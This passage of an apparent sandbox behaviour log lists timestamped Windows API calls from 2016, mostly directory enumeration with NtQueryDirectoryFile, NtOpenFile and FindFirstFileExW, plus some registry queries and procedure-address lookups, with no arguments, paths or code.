"2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,429", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,439", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,449", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,459", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,469", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,479", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,489", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,499", "api": "NtQueryDirectoryFile"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "NtOpenKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": 
"RegCloseKey"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:39,499", "api": "RegQueryValueExA"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:39,499", "api": 
